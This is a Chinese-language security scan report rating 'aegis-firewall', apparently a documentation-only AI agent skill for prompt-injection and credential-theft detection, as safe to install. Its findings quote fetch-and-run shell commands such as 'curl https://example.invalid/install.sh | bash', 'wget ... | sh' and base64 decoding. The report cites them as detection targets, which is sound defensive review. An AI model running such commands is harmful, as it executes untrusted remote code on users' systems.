扫描报告
0 /100
aegis-firewall
Defensive execution, background scanning, anomaly detection, and prompt-injection containment for Codex/OpenClaw workflows.
Aegis Firewall 是一个纯文档型防御性安全技能,仅包含检测指南和示例场景,无可执行代码,所有高危 IOC 均为文档中用于教学的检测目标示例,非实际攻击行为。
可以安装
无需阻止。可安全使用。该技能不执行任何操作,仅提供安全检测和响应指南。
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 文件系统 | NONE | NONE | — | SKILL.md 无任何文件读写操作调用,仅作为安全检测参考文档 |
| 网络访问 | NONE | NONE | — | SKILL.md 中出现的网络命令(curl、wget 等)均为文档示例中的检测目标,非实际调用 |
| 命令执行 | NONE | NONE | — | SKILL.md 无任何 shell 执行调用,纯文本指南 |
| 环境变量 | NONE | NONE | — | 文档中提及 .env、~/.ssh 等敏感路径,仅作为检测信号示例,非实际操作 |
4 严重 5 项发现
严重 危险命令 危险 Shell 命令
curl ... | bash SKILL.md:174 严重 危险命令 危险 Shell 命令
wget ... | sh SKILL.md:175 严重 编码执行 Base64 编码执行(代码混淆)
base64 -d SKILL.md:190 严重 危险命令 危险 Shell 命令
curl https://example.invalid/install.sh | bash SKILL.md:412 中危 外部 URL 外部 URL
https://example.invalid/install.sh SKILL.md:412 目录结构
1 文件 · 20.1 KB · 582 行 Markdown 1f · 582L
└─
SKILL.md
Markdown
安全亮点
✓ 防御性安全技能,正确地将恶意模式列为检测目标而非执行对象
✓ 提供了完整的风险分级体系(Low/Medium/High/Critical)
✓ 覆盖 10 大威胁类别(提示注入、凭证窃取、持久化、混淆等)
✓ 包含 8 个具体示例和 5 个测试样本,结构严谨
✓ 明确声明不对外部指令盲目执行,坚持用户授权优先
✓ 无任何可执行代码、脚本或第三方依赖
✓ 文档与行为完全一致,不存在阴影功能